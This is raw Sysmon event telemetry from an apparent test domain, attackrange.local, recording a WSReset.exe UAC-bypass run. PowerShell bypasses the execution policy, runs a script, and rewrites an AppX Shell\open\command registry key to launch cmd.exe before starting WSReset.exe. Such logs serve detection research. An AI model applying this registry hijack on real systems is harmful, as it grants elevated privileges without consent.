08:08:03.691{466BC892-02B0-60E8-1600-00000000CF01}13041340C:\Windows\System32\svchost.exe{466BC892-F863-60EB-FC7D-00000000CF01}7268C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054830Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.675{466BC892-F863-60EB-FC7D-00000000CF01}72688064C:\Windows\system32\conhost.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054829Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F863-60EB-FC7D-00000000CF01}7268C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054828Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054827Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.660{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.660{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-32CD-60E8-670B-00000000CF01}45166612C:\Windows\system32\csrss.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.660{466BC892-F862-60EB-F97D-00000000CF01}96246820C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\system32\WSReset.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+9070f|C:\Windows\System32\windows.storage.dll+90385|C:\Windows\System32\windows.storage.dll+8fe76|C:\Windows\System32\windows.storage.dll+912e8|C:\Windows\System32\windows.storage.dll+8fc9e|C:\Windows\System32\windows.storage.dll+92ab5|C:\Windows\System32\windows.storage.dll+92e34|C:\Windows\System32\windows.storage.dll+92470|C:\Windows\System32\shell32.dll+3cdcf|C:\Windows\System32\shell32.dll+3cc5c|C:\Windows\System32\shell32.dll+3c9ac|C:\Windows\System32\shell32.dll+122467|C:\Windows\System32\shell32.dll+1223c5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+38b30c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2d41f2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+af11c7|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c0449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01b0|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+1021d3a7(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+1021d3a7(wow64) 154100x80000000000000001054822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.660{466BC892-F863-60EB-FB7D-00000000CF01}1736C:\Windows\System32\WSReset.exe10.0.14393.4169 
(rs1_release.210107-1130)This tool resets the Windows Store without changing account settings or deleting installed appsMicrosoft® Windows® Operating SystemMicrosoft CorporationWSReset.exe"C:\Windows\system32\WSReset.exe" C:\Temp\test\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=5181342124A0AB97F865A39581CE9C41,SHA256=FE7AF6AC7EA79AEA47BFF06035875DD1975590F78C31797526908C1A4877EE84,IMPHASH=279E04CF32068F56394D78D663C285A4{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "-Command" "if((Get-ExecutionPolicy ) -ne 'AllSigned') { Set-ExecutionPolicy -Scope Process Bypass }; & 'C:\Temp\test\ws.ps1'" 13241300x80000000000000001054821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:03.492{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\(Default)C:\Windows\System32\cmd.exe /c start cmd.exe 13241300x80000000000000001054820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-SetValue2021-07-12 08:08:03.460{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command\DelegateExecute(Empty) 12241200x80000000000000001054819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-DeleteKey2021-07-12 08:08:03.444{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHKU\S-1-5-21-2333072374-3391925831-3197092227-1112_Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command 23542300x80000000000000001054818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CD9641D56F82BF278E858CA587D1971,SHA256=BB872FF80A17AE895E1E84C4AD5F2E34DBC6072DF567E9F269DEFDA9C228FDEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.206{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=313835DEA0AD20FAA887146FE1D0B887,SHA256=6EFF06AC0170AB73ACCABF7E0E9BD09ACF2A72F8544D4A4382B69128ADEEB9B5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.175{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCCAEA37CEF4CB550BCF8940765431AE,SHA256=8A7CE53977F8D63111A1225248FCD6BB709772F68A34C10ABAFFA01A632A54C9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:03.144{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:03.144{466BC892-02AD-60E8-0B00-00000000CF01}6249844C:\Windows\system32\lsass.exe{466BC892-F862-60EB-F97D-00000000CF01}9624C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x80000000000000001054813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 08:08:03.106{466BC892-F862-60EB-F97D-00000000CF01}9624\PSHost.132705508822201904.9624.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x80000000000000001054871Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.876{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D3DE95903F6B136E741C27EF1CD62DC7,SHA256=53BB6A971A599198EBF14C8BFB53E40B757D33ED0EDCC6E37948E5F2A0DC15E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810418Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:08:04.543{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A52C77698F26B4220DA44B77F1E326B,SHA256=353CCD6F96F269A46E26CB7ECA80E9E5EABE9C76CB5A5B4DDE279307ACB6AD43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054870Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.661{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8CD9641D56F82BF278E858CA587D1971,SHA256=BB872FF80A17AE895E1E84C4AD5F2E34DBC6072DF567E9F269DEFDA9C228FDEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001054869Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.308{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6B9C3A90617C7BD985A6C9EC63368B4,SHA256=C49548BEFA1292C4B8217D62A43E27C707171CE7743FC3582BDD73ACCB3AA048,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054868Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.123{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054867Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.123{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001054866Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.123{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054865Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.107{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x101000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\Windows.UI.Immersive.dll+1d16|C:\Windows\System32\Windows.UI.Immersive.dll+2362|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider
.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054864Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.107{466BC892-32D3-60E8-770B-00000000CF01}63567232C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\Windows.UI.Immersive.dll+2f6d|C:\Windows\System32\Windows.UI.Immersive.dll+2213|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1d03|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+618c3|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001054863Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+62945|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054862Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054861Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63566316C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054860Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61d9f|C:\Windows\System32\SHELL32.dll+622c0|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054859Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:08:04.091{466BC892-32D3-60E8-770B-00000000CF01}63567280C:\Windows\Explorer.EXE{466BC892-F863-60EB-FD7D-00000000CF01}6276C:\Windows\system32\OpenWith.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47c90|C:\Windows\System32\SHELL32.dll+6227c|C:\Windows\System32\TwinUI.dll+12d491|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054858Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
